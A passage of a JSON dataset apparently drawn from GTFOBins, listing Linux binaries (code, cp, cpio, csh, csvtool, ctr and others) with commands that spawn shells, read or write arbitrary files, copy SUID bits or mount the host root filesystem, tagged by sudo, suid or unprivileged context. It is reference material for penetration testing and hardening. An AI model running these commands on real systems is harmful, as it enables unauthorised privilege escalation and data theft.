xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:codex:shell:0:sudo","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:codex:shell:0:unprivileged","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/codex/"]},{"id":"gtfo:column:file-read:0:sudo","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:suid","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:column:file-read:0:unprivileged","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/column/"]},{"id":"gtfo:comm:file-read:0:sudo","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:suid","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:comm:file-read:0:unprivileged","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/comm/"]},{"id":"gtfo:composer:shell:0:sudo","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:composer:shell:0:unprivileged","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/composer/"]},{"id":"gtfo:cowsay:inherit:0:sudo","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowsay:inherit:0:unprivileged","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowsay/"]},{"id":"gtfo:cowthink:inherit:0:sudo","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cowthink:inherit:0:unprivileged","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowthink/"]},{"id":"gtfo:cp:file-read:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-read:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:file-write:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cp:privilege-escalation:1:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"]},{"id":"gtfo:cpan:inherit:0:sudo","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpan:inherit:0:unprivileged","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpan/"]},{"id":"gtfo:cpio:file-read:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-read:1:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:file-write:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpio:shell:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"]},{"id":"gtfo:cpulimit:shell:0:sudo","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:suid","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:cpulimit:shell:0:unprivileged","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpulimit/"]},{"id":"gtfo:crash:command:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:command:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:suid","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crash:inherit:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"]},{"id":"gtfo:crontab:command:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:command:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:crontab:inherit:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"]},{"id":"gtfo:csh:file-write:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file' -b","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:file-write:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csh:shell:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"]},{"id":"gtfo:csplit:file-read:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csvtool:file-read:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:ctr:shell:0:sudo","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:ctr:shell:0:suid","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images 